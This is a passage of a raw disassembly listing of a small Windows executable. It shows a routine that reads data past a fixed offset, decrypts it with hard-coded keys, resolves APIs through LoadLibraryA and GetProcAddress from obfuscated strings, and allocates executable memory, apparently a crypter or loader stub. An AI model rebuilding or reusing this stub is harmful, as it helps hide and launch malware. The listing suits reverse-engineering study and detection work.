mov dword_403274, eax
call dword_403288
mov dword_4312B4, eax
inc eax
push eax ; dwBytes
call sub_401000
pop ecx
push ebx
lea ecx, [ebp+var_4]
push ecx
push dword_4312B4
mov dword_403264, eax
push eax
push dword_403274
call dword_4032D0
push [ebp+var_4]
push ebx
call sub_40176E
mov eax, [ebp+var_4]
pop ecx
pop ecx
lea edx, [eax-1800h]
xor ecx, ecx
test edx, edx
jbe short loc_401BC6
loc_401BA3: ; CODE XREF: sub_401B31+93�j
mov eax, dword_403264
mov al, [eax+ecx+1800h]
mov edx, dword_431298
mov [edx+ecx], al
mov eax, [ebp+var_4]
inc ecx
lea edx, [eax-1800h]
cmp ecx, edx
jb short loc_401BA3
loc_401BC6: ; CODE XREF: sub_401B31+70�j
mov ecx, dword_431298
mov [ecx+eax-1800h], bl
mov eax, [ebp+var_4]
add eax, 0FFFFE800h
push eax
push dword_431298
push offset aCdsafreytd ; "cdsafreytd"
call sub_40102B
lea ecx, [ebp+var_8]
push ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFE800h
push ecx
push ebx
push eax
push ebx
call sub_401AED
push [ebp+var_8]
push eax
push offset aE5gfdevjns ; "e5gfdevjns"
call sub_40102B
lea ecx, [ebp+var_8]
push ecx
push [ebp+var_8]
push ebx
push eax
push ebx
call sub_401AED
add esp, 40h
mov dword_403264, eax
pop ebx
leave
retn
sub_401B31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
var_524 = byte ptr -524h
var_258 = byte ptr -258h
var_158 = byte ptr -158h
var_78 = byte ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 524h
push ebx
push esi
push edi
call sub_40182B
push 100h
lea eax, [ebp+var_258]
push eax
xor ebx, ebx
push ebx
call dword_4032E0
call sub_401780
test al, al
jnz loc_401D80
lea eax, [ebp+var_258]
push eax
push ebx
call sub_401B31
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_78]
push eax
call sub_401160
add esp, 18h
test al, al
jz loc_401D80
push [ebp+var_4]
lea eax, [ebp+var_158]
push eax
push ebx
push ebx
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_78]
push eax
call sub_401314
add esp, 18h
push 40h
push 1000h
push eax
push ebx
mov [ebp+var_8], eax
call dword_4032C0
push ebx
push ebx
push eax
push [ebp+var_4]
mov dword_4312A0, eax
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_78]
push eax
call sub_40138A
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_524]
push eax
lea eax, [ebp+var_38]
push eax
push ebx
push ebx
lea eax, [ebp+var_258]
push eax
push ebx
call sub_401557
add esp, 38h
push [ebp+var_C]
mov ecx, 0B3h
push [ebp+var_10]
lea esi, [ebp+var_524]
sub esp, 2CCh
mov edi, esp
sub esp, 10h
rep movsd
mov edi, esp
push ebx
lea eax, [ebp+var_258]
push eax
push ebx
push [ebp+var_8]
lea esi, [ebp+var_38]
push dword_4312A0
movsd
push [ebp+var_4]
movsd
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_28]
movsd
push eax
lea eax, [ebp+var_78]
push eax
movsd
call sub_401618
add esp, 308h
push ebx
push [ebp+var_8]
push dword_4312A0
push dword_4312B8
push dword_4312A8
call dword_4032D4
push dword_403284
mov byte_4312AC, 1
call dword_403268
loc_401D80: ; CODE XREF: start+2D�j start+5D�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
start endp
; ---------------------------------------------------------------------------
align 80h
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 000000AE ( 174.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00001200
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_40182B+7E�p
; sub_40182B+9A�p ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_40182B+2E�p
; sub_40182B+47�p ...
; HGLOBAL __stdcall GlobalAlloc(UINT uFlags, SIZE_T dwBytes)
extrn GlobalAlloc:dword ; CODE XREF: sub_401000+8�p
; DATA XREF: sub_401000+8�r
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40200Ch
align 10h
dword_402010 dd 30h aGbvcnfisugd db 'gbvcnfisugd',0 ; DATA XREF: sub_401780+1A�o
; sub_40182B+9�o
aE5gfdevjns db 'e5gfdevjns',0 ; DATA XREF: sub_401B31+D5�o
align 4
aCdsafreytd db 'cdsafreytd',0 ; DATA XREF: sub_401B31+B1�o
align 4
db '` ',0
align 4
dd 2 dup(0)
dd 20A0h, 2000h, 5 dup(0)
dd 207Eh, 2090h, 2070h, 0
dd 6C4701EEh, 6C61626Fh, 6F6C6C41h, 1980063h, 50746547h
dd 41636F72h, 65726464h, 7373h, 6F4C0248h, 694C6461h, 72617262h
dd 4179h, 4E52454Bh, 32334C45h, 6C6C642Eh, 55h dup(0)
_rdata ends
; Section 3. (virtual address 00003000)
; Virtual size : 0002E2BC ( 189116.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00001400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 403000h
dword_403000 dd 5C4F7176h, 0C5FC5D95h, 92245E05h, 96AEhdword_403010 dd 65497D67h, 0E8E5588Fh, 9D22740Ch, 5C50A08Eh, 0F5A3h
; DATA XREF: sub_40182B+2A4�o
aZohfnR db 'zohF]',0 ; DATA XREF: sub_40182B+FC�o
aWNTrMi db 'W<TR',0
align 4
dd 4D586A66h, 0F6F255ACh, 324008h
dword_403048 dd 49586A63h, 0F6C05994h, 822E5106h, 0AF98haKOfepgGvA db 'K}OFPGV',27h,'',0 ; DATA XREF: sub_40182B+38�o
align 4
dword_403068 dd 7C497D67h, 0E5F54E88h, 9F24710Dh, 45498B9Fh, 0
; DATA XREF: sub_40182B+1DC�o
dword_40307C dd 4C5C7D72h, 0E7FF4EB0h, 0BC38410Ch, 435E838Eh, 0BFh
; DATA XREF: sub_40182B+26C�o
dword_403090 dd 795A7D72h, 0FDE25995h, 8427533Fh, 7049AB8Eh, 0
; DATA XREF: sub_40182B+214�o
dword_4030A4 dd 5C4F7176h, 0D4FC5D95h, 943F5D1Bh, 49749A88h, 0
; DATA XREF: sub_40182B+288�o
aWjtEltiW8vjl db 'wjT\l',0Ah ; DATA XREF: sub_40182B+A6�o
db 'W8\^',0
align 4
dword_4030CC dd 585C6F73h, 0F7E553ADh, 853E700Ch, 425F819Fh, 0
; DATA XREF: sub_401780+6C�o
dword_4030E0 dd 7C497D73h, 0E5F54E88h, 9F24710Dh, 45498B9Fh, 0
; DATA XREF: sub_40182B+188�o
aAKiUgGvA db 'a\kiuGV',27h,'',0 ; DATA XREF: sub_40182B+18�o
align 4
dword_403104 dd 5C537763h, 0A4FC5392h, 94255339h, 5E7CB287h, 86C7B3h
; DATA XREF: sub_401780+2F�o
dword_403118 dd 5C4F7176h, 0C5FC5D95h, 92245E05h, 0aRNNyWX db 'r}N]Y',1Bh,'W*',0 ; DATA XREF: sub_40182B+118�o
align 4
dd 454F7D74h, 0F0F15289h, 9E39620Ch, 42428B88h, 0
dd 5C4F7176h, 0C2FC5D95h, 2E571Bh, 4D587473h, 90h, 5B527463h
dd 0EAF17485h, 2E5E0Dh, 64497D67h, 0E8F15F8Fh, 94265B3Dh
dd 0
dword_40317C dd 44596C4Eh, 0E8F4128Ch, 5, 64497D73h, 0E8F15F8Fh, 94265B3Dh
; DATA XREF: sub_40182B+50�o
dd 0
dword_403198 dd 6C516C72h, 0E9FF5F85h, 822E4019h, 5744AC98h, 91D1A0h
; DATA XREF: sub_40182B+134�o
dword_4031AC dd 49586A63h, 0EDD65994h, 0A5705hdword_4031B8 dd 6B516C72h, 0F6E0518Fh, 0B338410Ch, 5457889Eh, 0B4h
; DATA XREF: sub_40182B+68�o
dword_4031CC dd 4C5C7D72h, 0E1FC55A6h, 0dword_4031D8 dd 6F516C72h, 0EBD34885h, 94394204h, 5E589D98h, 0F78CE3A8h
; DATA XREF: sub_40182B+1F8�o
dd 0CCEB0A55h, 0A2D1967Bh, 0BE9Dh
dword_4031F8 dd 6E497D67h, 0D7F55089h, 2E4800h, 6E497D73h, 0D4F55089h
; DATA XREF: sub_40182B+DD�o
dd 85255B06h, 9C8Eh, 7D497D67h, 0CAE25993h, 0B02E5F08h
dd 0
dword_403224 dd 675A7D72h, 0CFFE5990h, 0A4B0Ch, 494B7C41h, 0B6A35590h
; DATA XREF: sub_40182B+232�o
dd 9D275647h, 0
aRZkmsusW2 db 'r}ZkS"W2',0 ; DATA XREF: sub_40182B+C2�o
dword_40324C dd 5C4F7176h, 0D5FC5D95h, 8839571Ch, 96AEh, 0byte_403260 db 0 ; DATA XREF: sub_401160+3D�w
; sub_40138A+26�w ...
align 4
dword_403264 dd 0 ; sub_401160+9�r ...
dword_403268 dd 0 ; start+150�r
dword_40326C dd 0 ; sub_401618+A5�r ...
dword_403270 dd 0 ; sub_40182B+D8�w
dword_403274 dd 0 ; sub_401B31+4C�r
dword_403278 dd 0 ; sub_40182B+110�w
dword_40327C dd 0 ; sub_40182B+280�w
byte_403280 db 0 ; DATA XREF: sub_401160+11�w
; sub_401160+37�w ...
align 4
dword_403284 dd 0 ; start+143�r
dword_403288 dd 0 ; sub_401B31+28�r
dword_40328C dd 0 ; sub_401AED+25�r
dword_403290 dd 0 ; sub_401B31+1B�r
dword_403294 dd 3 dup(0) dword_4032A0 dd 0 dword_4032A4 dd 0 align 10h
dword_4032B0 dd 0 dword_4032B4 dd 0 ; sub_401AED+38�r
align 10h
dword_4032C0 dd 0 dword_4032C4 dd 0 ; sub_40182B+248�w
dword_4032C8 dd 0 ; sub_40182B+1F0�w
dword_4032CC dd 0 dword_4032D0 dd 0 ; sub_401B31+52�r
dword_4032D4 dd 0 ; sub_40182B+BA�w ...
byte_4032D8 db 0 ; DATA XREF: sub_401160+1A�w
; sub_401160+23�w ...
align 4
dword_4032DC dd 0 ; sub_40182B+19C�w
dword_4032E0 dd 0 align 8
byte_4032E8 db 0 ; DATA XREF: sub_40113B+17�w
; sub_401160+7B�o ...
dword_4032E9 dd 0 ; sub_401160+B6�r ...
align 10h
dd 4 dup(0)
byte_403300 db 0 ; DATA XREF: sub_401160+A7�w
align 4
dd 9 dup(0)
byte_403328 db 0 ; DATA XREF: sub_401160+56�w
align 4
dd 27h dup(0)
byte_4033C8 db 0 ; DATA XREF: sub_401160+EF�w
align 4
dd 0Dh dup(0)
dd 0B7A4h dup(?)
dword_431290 dd ? ; sub_40182B+264�w
dword_431294 dd ? dword_431298 dd ? ; sub_401B31+7E�r ...
dword_43129C dd ? ; sub_40182B+164�w
dword_4312A0 dd ? dword_4312A4 dd ? ; sub_40182B+29C�w
dword_4312A8 dd ? ; start+137�r
byte_4312AC db ? ; DATA XREF: start+149�w
align 10h
dword_4312B0 dd ? ; sub_40182B+22A�w
dword_4312B4 dd ? ; sub_401160+8B�r ...
dword_4312B8 dd ? ; sub_401618+7F�w ...
align 200h
_data ends
end start